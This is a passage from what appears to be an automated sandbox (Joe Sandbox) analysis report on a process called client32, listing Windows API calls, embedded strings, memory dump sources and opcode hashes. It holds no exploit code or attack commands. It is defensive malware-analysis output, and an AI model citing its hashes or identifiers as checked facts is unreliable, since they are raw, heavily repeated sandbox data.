                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FolderPath$FileName$ModuleSave
                                                                                                                                                                                                    • String ID: ChatPath$X
                                                                                                                                                                                                    • API String ID: 215883650-3955712077
                                                                                                                                                                                                    • Opcode ID: 7d7448241aee43a2d8f22d35a57381c1f70013038142bcfdf2693d044c7d6820
                                                                                                                                                                                                    • Instruction ID: 6a45e0ccd222e521db2cf8660e7e75a9c6c8819791f7e0b2186df894ceae34f3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d7448241aee43a2d8f22d35a57381c1f70013038142bcfdf2693d044c7d6820
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C51C275E043299FEB21DF60CC48BDEFBB4AF45704F1041D9D909AB280EB75AA84CB91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SendMessageA.USER32(?,00000146,00000000,00000000), ref: 110334C3
                                                                                                                                                                                                    • SendMessageA.USER32(?,00000149,00000000,00000000), ref: 110334E9
                                                                                                                                                                                                    • SendMessageA.USER32(?,00000148,00000000,?), ref: 1103350D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&')(.-_{}~., xrefs: 110334A5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                    • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&')(.-_{}~.
                                                                                                                                                                                                    • API String ID: 3850602802-2723064302
                                                                                                                                                                                                    • Opcode ID: bd44523ccd12641375facf51592b89295bfeb8cb24e0a09ba3e6b882b1ec2f72
                                                                                                                                                                                                    • Instruction ID: bc9ce7f87aeaad0c1939b1cc53b23d9fe1575812c47fb94f3614b61ec272b28a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd44523ccd12641375facf51592b89295bfeb8cb24e0a09ba3e6b882b1ec2f72
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 19410632E1425A5FD712CE748CC0BAAB7E99F81316F1446E5E919DF3D0EA31DA488B40
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • IsWindow.USER32(?), ref: 110354BF
                                                                                                                                                                                                    • EnumChildWindows.USER32(?,Function_00035030), ref: 110354FC
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                      • Part of subcall function 11033760: IsWindow.USER32(?), ref: 11033768
                                                                                                                                                                                                      • Part of subcall function 11033760: GetWindowLongA.USER32(?,000000F0), ref: 1103377B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$ChildEnumErrorExitLastLongMessageProcessWindowswsprintf
                                                                                                                                                                                                    • String ID: CltAutoLogon.cpp$IsWindow(hDia)
                                                                                                                                                                                                    • API String ID: 2743442841-2884807542
                                                                                                                                                                                                    • Opcode ID: 21a2b76fec222c1e6d0d260998ef43525eec84e1817e013d231b49b2bb670141
                                                                                                                                                                                                    • Instruction ID: 266056e39768e9626d6b00a12ef6d260c21a84dff935472d76ead0117b905fd9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 21a2b76fec222c1e6d0d260998ef43525eec84e1817e013d231b49b2bb670141
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3241CFB5E207059FC720DF24C991B9AB7F6BF8071AF50846DD84687AA0EB32F544CB91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,05C2A5B0), ref: 689CFB04
                                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 689CFB69
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000000,00000000), ref: 689CFBA4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$EnterEventLeave
                                                                                                                                                                                                    • String ID: list<T> too long
                                                                                                                                                                                                    • API String ID: 3094578987-4027344264
                                                                                                                                                                                                    • Opcode ID: 2759775809ae8f1ed453683065376b7a3157b06c43dc39ea99a0d3b2b94a2d52
                                                                                                                                                                                                    • Instruction ID: 72887ae5fd21a5bab0145187ed1a3c613b828aac85b3e3782f4f656c3c30e90a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2759775809ae8f1ed453683065376b7a3157b06c43dc39ea99a0d3b2b94a2d52
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE3190756046049FD714CF64D940B6ABBF8FF89318F50861DE85E97784D7B1E900CB62
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • #16.WSOCK32(?,?,?,00000000), ref: 689C79F1
                                                                                                                                                                                                    • WSAGetLastError.WSOCK32(?,?,?,00000000), ref: 689C7A16
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast
                                                                                                                                                                                                    • String ID: hbuf->data$httputil.c
                                                                                                                                                                                                    • API String ID: 1452528299-2732665889
                                                                                                                                                                                                    • Opcode ID: efcc37cc3abf63578f8da182d65c7e1ef50c80152737972e0aedc237ae1fabab
                                                                                                                                                                                                    • Instruction ID: 3fc862788f2df539e016906c7cbd450375134844833f95a0f53d799842c9c723
                                                                                                                                                                                                    • Opcode Fuzzy Hash: efcc37cc3abf63578f8da182d65c7e1ef50c80152737972e0aedc237ae1fabab
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3621307A600B01AFD320CE69DC40E27B7F9EF95669B54C82DD8AE87701D732F8418B52
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateWindowExA.USER32(80000000,SysListView32,11190240,?,?,?,?,00000000,80000000,?,00000000,00000000), ref: 110A9628
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateWindow
                                                                                                                                                                                                    • String ID: ..\ctl32\listview.cpp$SysListView32$m_hWnd
                                                                                                                                                                                                    • API String ID: 716092398-3171529584
                                                                                                                                                                                                    • Opcode ID: 637c1e481861933b660f9025ac84e75a0f093096606961fd602d82f68461a821
                                                                                                                                                                                                    • Instruction ID: 47062bfc9542a2c6c353129ffb0ec6f2ada6c6bd4fa77e90f028d1fc367f12b4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 637c1e481861933b660f9025ac84e75a0f093096606961fd602d82f68461a821
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74218E7960020AAFDB14DF59DC81FDBBBE9AF88314F10861DF95987281DB74E941CBA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProfileStringA.KERNEL32(Windows,Device,,,LPT1:,?,00000080), ref: 1113F39E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ProfileString
                                                                                                                                                                                                    • String ID: ,,LPT1:$Device$Windows
                                                                                                                                                                                                    • API String ID: 1468043044-2967085602
                                                                                                                                                                                                    • Opcode ID: 545c589ca3c1c67feaf2385bf7ba58e2cdbbd1510027cf68d9306f3142d9ecb6
                                                                                                                                                                                                    • Instruction ID: bcd620f34367886d122ba7e5b4bc1f5e42e64e22dfa310253f00a50472163b57
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 545c589ca3c1c67feaf2385bf7ba58e2cdbbd1510027cf68d9306f3142d9ecb6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42112965A0425B9AEB108F24AD45BBAF768EF8520DF0040A8ED859714AEA316609C7B3
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 689B6C0F
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 689B6C2E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                                                                    • String ID: *$InternetQueryOptionA
                                                                                                                                                                                                    • API String ID: 199729137-4161725205
                                                                                                                                                                                                    • Opcode ID: 2231b954a9c25c328da5ef9251225679e58906c26466b9cefeee94ffdee9f711
                                                                                                                                                                                                    • Instruction ID: ba04e694ade51627e7a77524483b0ee297ad1dfca2faded74705d06fc0c525f7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2231b954a9c25c328da5ef9251225679e58906c26466b9cefeee94ffdee9f711
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A3218071904208DFCB55DFA8DD40AAEBBF4FF49314F50815AEA16AB280D770AE44CF90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 1114107C
                                                                                                                                                                                                    • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 111410B6
                                                                                                                                                                                                    • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 111410DF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ItemMenu$Info$Count
                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                    • API String ID: 4286743509-4108050209
                                                                                                                                                                                                    • Opcode ID: 0c1e1fdabff6bfde52f05e2d3fca83c1d12d76b79eb12fdf68bc459e20492bd0
                                                                                                                                                                                                    • Instruction ID: 2bcd32ba99f467236d3458310ced708016d2ad859b25bc85d693658704d9c718
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c1e1fdabff6bfde52f05e2d3fca83c1d12d76b79eb12fdf68bc459e20492bd0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E0016171A11219BBDB10DF95DD89FDEFBBCEB45758F108115F914E3140D7B0660487A1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetStockObject.GDI32(0000000D), ref: 1105D577
                                                                                                                                                                                                    • GetObjectA.GDI32(00000000,0000003C,?), ref: 1105D584
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Object$Stock
                                                                                                                                                                                                    • String ID: Courier$Terminal
                                                                                                                                                                                                    • API String ID: 1996491644-3811170643
                                                                                                                                                                                                    • Opcode ID: 368e2411fc192a29fe5015484b409b53d767746c889ea09147887535c4099fef
                                                                                                                                                                                                    • Instruction ID: be479150c513a8a397569f13c8542a34cf597b441a19bb81684db31ac8a0a52b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 368e2411fc192a29fe5015484b409b53d767746c889ea09147887535c4099fef
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B118B31504764DBD3708F28C848B4ABFE9AB4A328F00472EE5F987385C771A546CB59
                                                                                                                                                                                                    APIs
